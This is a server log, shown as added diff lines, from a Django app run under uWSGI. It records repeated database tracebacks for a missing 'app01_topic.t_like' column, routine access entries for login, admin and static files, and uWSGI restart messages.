+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 31, in home
+ for t in recommends:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 287, in __iter__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'")
+[pid: 32185|app: 0|req: 31/55] 219.228.146.146 () {40 vars in 884 bytes} [Thu Jan 14 07:24:06 2021] GET /home/ => generated 183082 bytes in 118 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 32185|app: 0|req: 32/56] 219.228.146.253 () {36 vars in 692 bytes} [Thu Jan 14 07:24:14 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0)
+[pid: 32185|app: 0|req: 33/57] 219.228.146.253 () {36 vars in 694 bytes} [Thu Jan 14 07:24:14 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 32185|app: -1|req: -1/58] 219.228.146.253 () {38 vars in 717 bytes} [Thu Jan 14 07:24:14 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/59] 219.228.146.253 () {38 vars in 739 bytes} [Thu Jan 14 07:24:14 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/60] 219.228.146.253 () {38 vars in 721 bytes} [Thu Jan 14 07:24:14 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/61] 219.228.146.253 () {38 vars in 719 bytes} [Thu Jan 14 07:24:14 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/62] 219.228.146.253 () {38 vars in 725 bytes} [Thu Jan 14 07:24:14 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/63] 219.228.146.253 () {38 vars in 700 bytes} [Thu Jan 14 07:24:14 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/64] 219.228.146.253 () {38 vars in 698 bytes} [Thu Jan 14 07:24:14 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/65] 219.228.146.253 () {38 vars in 716 bytes} [Thu Jan 14 07:24:14 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/66] 219.228.146.253 () {38 vars in 706 bytes} [Thu Jan 14 07:24:14 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/67] 219.228.146.253 () {38 vars in 714 bytes} [Thu Jan 14 07:24:14 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/68] 219.228.146.253 () {38 vars in 771 bytes} [Thu Jan 14 07:24:17 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 32185|app: -1|req: -1/69] 219.228.146.253 () {38 vars in 745 bytes} [Thu Jan 14 07:24:17 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 32185|app: 0|req: 34/70] 219.228.146.253 () {48 vars in 916 bytes} [Thu Jan 14 07:24:41 2021] POST /login/ => generated 27 bytes in 28 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 32185|app: 0|req: 35/71] 219.228.146.253 () {40 vars in 873 bytes} [Thu Jan 14 07:24:41 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+Internal Server Error: /home/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 31, in home
+ for t in recommends:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 287, in __iter__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1054, "Unknown column 'app01_topic.t_like' in 'field list'")
+[pid: 32185|app: 0|req: 36/72] 219.228.146.253 () {40 vars in 875 bytes} [Thu Jan 14 07:24:41 2021] GET /home/ => generated 183073 bytes in 101 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Not Found: /favicon.ico
+[pid: 32185|app: 0|req: 37/73] 219.228.146.253 () {38 vars in 766 bytes} [Thu Jan 14 07:24:52 2021] GET /favicon.ico => generated 3480 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /
+[pid: 32185|app: 0|req: 38/74] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 07:25:42 2021] GET / => generated 3429 bytes in 6 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /
+[pid: 32185|app: 0|req: 39/75] 61.151.179.84 () {32 vars in 540 bytes} [Thu Jan 14 07:32:41 2021] GET / => generated 3429 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Gracefully killing worker 1 (pid: 32185)...
+gateway "uWSGI http 1" has been buried (pid: 32186)
+...gracefully killing workers...
+worker 1 buried after 1 seconds
+binary reloading uWSGI...
+chdir() to /www/wwwroot/master
+closing all non-uwsgi socket fds > 2 (max_fd = 100001)...
+found fd 3 mapped to socket 0 (127.0.0.1:35412)
+running /www/wwwroot/master/pyweb/bin/uwsgi
+[uWSGI] getting INI configuration from uwsgi.ini
+[uwsgi-static] added mapping for /static => /www/wwwroot/master/static
+*** Starting uWSGI 2.0.19.1 (64bit) on [Thu Jan 14 07:33:42 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 14 January 2021 03:06:44
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-8-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /www/wwwroot/master
+detected binary path: /www/wwwroot/master/pyweb/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 3874
+your memory page size is 4096 bytes
+detected max file descriptor number: 100001
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+uWSGI http bound on 0.0.0.0:8000 fd 5
+uwsgi socket 0 bound to TCP address 127.0.0.1:33392 (port auto-assigned) fd 4
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+Python version: 3.6.6 (default, Jan 14 2021, 10:51:21) [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)]
+Python main interpreter initialized at 0x1034e30
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+python threads support enabled
+your server socket listen backlog is limited to 100 connections
+your mercy for graceful operations on workers is 60 seconds
+mapped 166752 bytes (162 KB) for 2 cores
+*** Operational MODE: threaded ***
+WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x1034e30 pid: 32183 (default app)
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+*** uWSGI is running in multiple interpreter mode ***
+gracefully (RE)spawned uWSGI master process (pid: 32183)
+spawned uWSGI worker 1 (pid: 2069, cores: 2)
+spawned uWSGI http 1 (pid: 2070)
+*** Starting uWSGI 2.0.19.1 (64bit) on [Thu Jan 14 15:34:21 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 14 January 2021 03:06:44
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-8-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /www/wwwroot/master
+detected binary path: /www/wwwroot/master/pyweb/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 3874
+your memory page size is 4096 bytes
+detected max file descriptor number: 100001
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+probably another instance of uWSGI is running on the same address (0.0.0.0:8000).
+bind(): Address already in use [core/socket.c line 769]
+Not Found: /
+[pid: 2069|app: 0|req: 1/1] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 07:34:29 2021] GET / => generated 3429 bytes in 28 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 2/2] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 07:34:36 2021] GET /login/ => generated 6428 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: -1|req: -1/3] 219.228.146.156 () {40 vars in 865 bytes} [Thu Jan 14 07:34:36 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/4] 219.228.146.156 () {40 vars in 887 bytes} [Thu Jan 14 07:34:36 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/5] 219.228.146.156 () {40 vars in 869 bytes} [Thu Jan 14 07:34:36 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/6] 219.228.146.156 () {40 vars in 867 bytes} [Thu Jan 14 07:34:36 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/7] 219.228.146.156 () {40 vars in 873 bytes} [Thu Jan 14 07:34:36 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/8] 219.228.146.156 () {40 vars in 848 bytes} [Thu Jan 14 07:34:36 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/9] 219.228.146.156 () {40 vars in 846 bytes} [Thu Jan 14 07:34:36 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/10] 219.228.146.156 () {40 vars in 864 bytes} [Thu Jan 14 07:34:36 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/11] 219.228.146.156 () {40 vars in 862 bytes} [Thu Jan 14 07:34:36 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/12] 219.228.146.156 () {40 vars in 854 bytes} [Thu Jan 14 07:34:36 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/13] 219.228.146.156 () {40 vars in 908 bytes} [Thu Jan 14 07:34:38 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: 0|req: 3/14] 219.228.146.156 () {40 vars in 921 bytes} [Thu Jan 14 07:34:41 2021] GET /my-admin/ => generated 5366 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 4/15] 219.228.146.156 () {48 vars in 1018 bytes} [Thu Jan 14 07:34:51 2021] POST /my-admin/ => generated 27 bytes in 24 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 5/16] 219.228.146.156 () {40 vars in 928 bytes} [Thu Jan 14 07:34:52 2021] GET /admin-home/ => generated 6515 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: -1|req: -1/17] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 07:34:52 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 3 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/18] 219.228.146.156 () {38 vars in 807 bytes} [Thu Jan 14 07:34:52 2021] GET /static/css/style.css => generated 118751 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/19] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 07:34:52 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/20] 219.228.146.156 () {38 vars in 848 bytes} [Thu Jan 14 07:34:52 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/21] 219.228.146.156 () {38 vars in 836 bytes} [Thu Jan 14 07:34:52 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 3 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/22] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 07:34:52 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/23] 219.228.146.156 () {38 vars in 812 bytes} [Thu Jan 14 07:34:52 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/24] 219.228.146.156 () {38 vars in 788 bytes} [Thu Jan 14 07:34:53 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/25] 219.228.146.156 () {38 vars in 800 bytes} [Thu Jan 14 07:34:53 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/26] 219.228.146.156 () {38 vars in 876 bytes} [Thu Jan 14 07:34:54 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/27] 219.228.146.156 () {38 vars in 798 bytes} [Thu Jan 14 07:34:54 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/28] 219.228.146.156 () {38 vars in 872 bytes} [Thu Jan 14 07:34:54 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 6/29] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 07:34:54 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 7/30] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 07:34:54 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 8/31] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 07:34:54 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 9/32] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 07:34:54 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 10/33] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:34:54 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 11/34] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 07:34:54 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 12/35] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 07:34:54 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 13/36] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 07:34:54 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 14/37] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 07:34:55 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 15/38] 219.228.146.156 () {40 vars in 932 bytes} [Thu Jan 14 07:35:51 2021] GET /announcement => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 16/39] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 07:35:51 2021] GET /announcement/ => generated 7421 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 17/40] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 07:35:52 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
